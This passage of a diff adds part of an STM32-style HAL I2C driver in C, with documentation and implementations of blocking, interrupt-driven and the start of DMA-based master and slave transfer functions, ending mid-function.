to manage the I2C data + transfers. + + (#) There are two modes of transfer: + (++) Blocking mode : The communication is performed in the polling mode. + The status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode : The communication is performed using Interrupts + or DMA. These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated I2C IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + + (#) Blocking mode functions are : + (++) HAL_I2C_Master_Transmit() + (++) HAL_I2C_Master_Receive() + (++) HAL_I2C_Slave_Transmit() + (++) HAL_I2C_Slave_Receive() + (++) HAL_I2C_Mem_Write() + (++) HAL_I2C_Mem_Read() + (++) HAL_I2C_IsDeviceReady() + + (#) No-Blocking mode functions with Interrupt are : + (++) HAL_I2C_Master_Transmit_IT() + (++) HAL_I2C_Master_Receive_IT() + (++) HAL_I2C_Slave_Transmit_IT() + (++) HAL_I2C_Slave_Receive_IT() + (++) HAL_I2C_Mem_Write_IT() + (++) HAL_I2C_Mem_Read_IT() + (++) HAL_I2C_Master_Seq_Transmit_IT() + (++) HAL_I2C_Master_Seq_Receive_IT() + (++) HAL_I2C_Slave_Seq_Transmit_IT() + (++) HAL_I2C_Slave_Seq_Receive_IT() + (++) HAL_I2C_EnableListen_IT() + (++) HAL_I2C_DisableListen_IT() + (++) HAL_I2C_Master_Abort_IT() + + (#) No-Blocking mode functions with DMA are : + (++) HAL_I2C_Master_Transmit_DMA() + (++) HAL_I2C_Master_Receive_DMA() + (++) HAL_I2C_Slave_Transmit_DMA() + (++) HAL_I2C_Slave_Receive_DMA() + (++) HAL_I2C_Mem_Write_DMA() + (++) HAL_I2C_Mem_Read_DMA() + (++) HAL_I2C_Master_Seq_Transmit_DMA() + (++) HAL_I2C_Master_Seq_Receive_DMA() + (++) HAL_I2C_Slave_Seq_Transmit_DMA() + (++) HAL_I2C_Slave_Seq_Receive_DMA() + + (#) A set of Transfer Complete Callbacks are provided in non Blocking mode: + (++) HAL_I2C_MasterTxCpltCallback() + (++) HAL_I2C_MasterRxCpltCallback() + (++) HAL_I2C_SlaveTxCpltCallback() + (++) HAL_I2C_SlaveRxCpltCallback() + (++) HAL_I2C_MemTxCpltCallback() + (++) HAL_I2C_MemRxCpltCallback() + (++) HAL_I2C_AddrCallback() + (++) HAL_I2C_ListenCpltCallback() + (++) HAL_I2C_ErrorCallback() + (++) HAL_I2C_AbortCpltCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Transmits in master mode an amount of data in blocking mode. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Transmit(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Send Slave Address */ + if (I2C_MasterRequestWrite(hi2c, DevAddress, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + while (hi2c->XferSize > 0U) + { + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + hi2c->XferSize--; + + if ((__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) && (hi2c->XferSize != 0U)) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + hi2c->XferSize--; + } + + /* Wait until BTF flag is set */ + if (I2C_WaitOnBTFFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + } + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives in master mode an amount of data in blocking mode. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Receive(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Send Slave Address */ + if (I2C_MasterRequestRead(hi2c, DevAddress, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + if (hi2c->XferSize == 0U) + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + else if (hi2c->XferSize == 1U) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + else if (hi2c->XferSize == 2U) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Enable Pos */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + + while (hi2c->XferSize > 0U) + { + if (hi2c->XferSize <= 3U) + { + /* One byte */ + if (hi2c->XferSize == 1U) + { + /* Wait until RXNE flag is set */ + if (I2C_WaitOnRXNEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + /* Two bytes */ + else if (hi2c->XferSize == 2U) + { + /* Wait until BTF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BTF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + /* 3 Last bytes */ + else + { + /* Wait until BTF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BTF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + /* Wait until BTF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BTF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + } + else + { + /* Wait until RXNE flag is set */ + if (I2C_WaitOnRXNEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + } + } + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmits in slave mode an amount of data in blocking mode. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Transmit(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* If 10bit addressing mode is selected */ + if (hi2c->Init.AddressingMode == I2C_ADDRESSINGMODE_10BIT) + { + /* Wait until ADDR flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + + while (hi2c->XferSize > 0U) + { + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + return HAL_ERROR; + } + + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + hi2c->XferSize--; + + if ((__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) && (hi2c->XferSize != 0U)) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + hi2c->XferSize--; + } + } + + /* Wait until AF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_AF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear AF flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + /* Disable Address Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave mode an amount of data in blocking mode + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Receive(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + if ((pData == NULL) || (Size == (uint16_t)0)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + while (hi2c->XferSize > 0U) + { + /* Wait until RXNE flag is set */ + if (I2C_WaitOnRXNEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + return HAL_ERROR; + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + if ((__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) && (hi2c->XferSize != 0U)) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + } + + /* Wait until STOP flag is set */ + if (I2C_WaitOnSTOPFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + return HAL_ERROR; + } + + /* Clear STOP flag */ + __HAL_I2C_CLEAR_STOPFLAG(hi2c); + + /* Disable Address Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in master mode an amount of data in non-blocking mode with Interrupt + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Transmit_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in master mode an amount of data in non-blocking mode with Interrupt + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Receive_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in slave mode an amount of data in non-blocking mode with Interrupt + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Transmit_IT(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size) +{ + + if (hi2c->State == HAL_I2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave mode an amount of data in non-blocking mode with Interrupt + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Receive_IT(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size) +{ + + if (hi2c->State == HAL_I2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in master mode an amount of data in non-blocking mode with DMA + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Transmit_DMA(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + HAL_StatusTypeDef dmaxferstatus; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + + if (hi2c->XferSize > 0U) + { + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmatx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmatx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmatx->XferHalfCpltCallback = NULL; + hi2c->hdmatx->XferM1CpltCallback = NULL; + hi2c->hdmatx->XferM1HalfCpltCallback = NULL; + hi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmatx, (uint32_t)hi2c->pBuffPtr, (uint32_t)&hi2c->Instance->DR, 